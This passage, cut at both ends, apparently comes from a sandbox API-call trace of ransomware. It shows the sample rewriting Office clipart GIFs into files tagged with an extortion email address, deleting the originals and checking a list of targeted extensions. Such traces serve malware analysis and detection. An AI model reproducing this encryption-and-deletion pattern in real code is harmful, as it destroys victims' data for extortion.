Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0060.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.118] lstrlenW (lpString=".doc") returned 4 [0060.118] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.118] lstrlenW (lpString=".docx") returned 5 [0060.118] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.119] lstrlenW (lpString=".pdf") returned 4 [0060.119] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.119] lstrlenW (lpString=".xls") returned 4 [0060.119] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.119] lstrlenW (lpString=".xlsx") returned 5 [0060.119] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.119] lstrlenW (lpString=".ppt") returned 4 [0060.119] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.119] lstrlenW (lpString=".zip") returned 4 [0060.119] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.119] lstrlenW (lpString=".rar") returned 4 [0060.119] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.119] lstrlenW (lpString=".bz2") returned 4 [0060.119] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.119] lstrlenW (lpString=".7z") returned 3 [0060.119] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.119] lstrlenW (lpString=".dbf") returned 4 [0060.119] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.119] lstrlenW (lpString=".1cd") returned 4 [0060.119] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.119] lstrlenW (lpString=".jpg") returned 4 [0060.119] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.119] lstrlenW (lpString=".doc") returned 4 [0060.120] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.120] lstrlenW (lpString=".docx") returned 5 [0060.120] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.120] lstrlenW (lpString=".pdf") returned 4 [0060.120] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.120] lstrlenW (lpString=".xls") returned 4 [0060.120] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.120] lstrlenW (lpString=".xlsx") returned 5 [0060.120] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.120] lstrlenW (lpString=".ppt") returned 4 [0060.120] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.120] lstrlenW (lpString=".zip") returned 4 [0060.120] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.120] lstrlenW (lpString=".rar") returned 4 [0060.120] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.120] lstrlenW (lpString=".bz2") returned 4 [0060.120] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.120] lstrlenW (lpString=".7z") returned 3 [0060.120] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.120] lstrlenW (lpString=".dbf") returned 4 [0060.120] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.120] lstrlenW (lpString=".1cd") returned 4 [0060.120] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0060.120] lstrlenW (lpString=".jpg") returned 4 [0060.120] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.120] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.120] lstrlenW (lpString="AG00037_.GIF") returned 12 [0060.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.128] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=6684) returned 1 [0060.128] CloseHandle (hObject=0x358) returned 1 [0060.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 0x220 [0060.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.128] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.128] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.129] GetLastError () returned 0x0 [0060.129] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1a1c, lpOverlapped=0x0) returned 1 [0060.375] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1a20, lpOverlapped=0x0) returned 1 [0060.376] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.376] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.376] SetEndOfFile (hFile=0x350) returned 1 [0060.376] CloseHandle (hObject=0x350) returned 1 [0060.377] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.377] SetEndOfFile (hFile=0x358) returned 1 [0060.378] CloseHandle (hObject=0x358) returned 1 [0060.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0060.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.379] lstrlenW (lpString=".doc") returned 4 [0060.379] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.379] lstrlenW (lpString=".docx") returned 5 [0060.379] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.379] lstrlenW (lpString=".pdf") returned 4 [0060.379] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.379] lstrlenW (lpString=".xls") returned 4 [0060.379] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.379] lstrlenW (lpString=".xlsx") returned 5 [0060.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.379] lstrlenW (lpString=".ppt") returned 4 [0060.379] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.379] lstrlenW (lpString=".zip") returned 4 [0060.379] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.379] lstrlenW (lpString=".rar") returned 4 [0060.379] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.380] lstrlenW (lpString=".bz2") returned 4 [0060.380] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.380] lstrlenW (lpString=".7z") returned 3 [0060.380] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.380] lstrlenW (lpString=".dbf") returned 4 [0060.380] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.380] lstrlenW (lpString=".1cd") returned 4 [0060.380] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.380] lstrlenW (lpString=".jpg") returned 4 [0060.380] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.380] lstrlenW (lpString=".doc") returned 4 [0060.380] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.380] lstrlenW (lpString=".docx") returned 5 [0060.380] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.380] lstrlenW (lpString=".pdf") returned 4 [0060.380] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.380] lstrlenW (lpString=".xls") returned 4 [0060.380] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.381] lstrlenW (lpString=".xlsx") returned 5 [0060.381] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.381] lstrlenW (lpString=".ppt") returned 4 [0060.381] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.381] lstrlenW (lpString=".zip") returned 4 [0060.381] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.381] lstrlenW (lpString=".rar") returned 4 [0060.381] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.381] lstrlenW (lpString=".bz2") returned 4 [0060.381] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.381] lstrlenW (lpString=".7z") returned 3 [0060.381] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.381] lstrlenW (lpString=".dbf") returned 4 [0060.381] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.381] lstrlenW (lpString=".1cd") returned 4 [0060.381] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0060.381] lstrlenW (lpString=".jpg") returned 4 [0060.381] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.381] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.381] lstrlenW (lpString="AG00040_.GIF") returned 12 [0060.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.382] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=8097) returned 1 [0060.382] CloseHandle (hObject=0x358) returned 1 [0060.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 0x220 [0060.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.382] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.382] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.383] GetLastError () returned 0x0 [0060.383] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1fa1, lpOverlapped=0x0) returned 1 [0060.449] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1fb0, lpOverlapped=0x0) returned 1 [0060.450] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.450] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.450] SetEndOfFile (hFile=0x350) returned 1 [0060.450] CloseHandle (hObject=0x350) returned 1 [0060.451] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.451] SetEndOfFile (hFile=0x358) returned 1 [0060.452] CloseHandle (hObject=0x358) returned 1 [0060.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0060.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.453] lstrlenW (lpString=".doc") returned 4 [0060.453] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.453] lstrlenW (lpString=".docx") returned 5 [0060.453] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.453] lstrlenW (lpString=".pdf") returned 4 [0060.453] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.453] lstrlenW (lpString=".xls") returned 4 [0060.453] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.453] lstrlenW (lpString=".xlsx") returned 5 [0060.453] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.453] lstrlenW (lpString=".ppt") returned 4 [0060.453] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.453] lstrlenW (lpString=".zip") returned 4 [0060.453] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.453] lstrlenW (lpString=".rar") returned 4 [0060.453] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.453] lstrlenW (lpString=".bz2") returned 4 [0060.453] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.453] lstrlenW (lpString=".7z") returned 3 [0060.453] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.453] lstrlenW (lpString=".dbf") returned 4 [0060.453] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.453] lstrlenW (lpString=".1cd") returned 4 [0060.453] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.453] lstrlenW (lpString=".jpg") returned 4 [0060.453] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.454] lstrlenW (lpString=".doc") returned 4 [0060.454] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.454] lstrlenW (lpString=".docx") returned 5 [0060.454] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.454] lstrlenW (lpString=".pdf") returned 4 [0060.454] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.454] lstrlenW (lpString=".xls") returned 4 [0060.454] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.454] lstrlenW (lpString=".xlsx") returned 5 [0060.454] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.454] lstrlenW (lpString=".ppt") returned 4 [0060.454] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.454] lstrlenW (lpString=".zip") returned 4 [0060.454] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.454] lstrlenW (lpString=".rar") returned 4 [0060.454] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.454] lstrlenW (lpString=".bz2") returned 4 [0060.454] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.454] lstrlenW (lpString=".7z") returned 3 [0060.454] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.454] lstrlenW (lpString=".dbf") returned 4 [0060.454] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.454] lstrlenW (lpString=".1cd") returned 4 [0060.454] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0060.454] lstrlenW (lpString=".jpg") returned 4 [0060.454] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.455] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.455] lstrlenW (lpString="AG00090_.GIF") returned 12 [0060.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.456] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=517) returned 1 [0060.456] CloseHandle (hObject=0x358) returned 1 [0060.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 0x220 [0060.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.456] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.456] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.457] GetLastError () returned 0x0 [0060.457] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x205, lpOverlapped=0x0) returned 1 [0060.458] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x210, lpOverlapped=0x0) returned 1 [0060.459] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.459] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.459] SetEndOfFile (hFile=0x350) returned 1 [0060.459] CloseHandle (hObject=0x350) returned 1 [0060.460] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.460] SetEndOfFile (hFile=0x358) returned 1 [0060.461] CloseHandle (hObject=0x358) returned 1 [0060.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.461] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0060.462] lstrlenW (lpString="C:\\Program 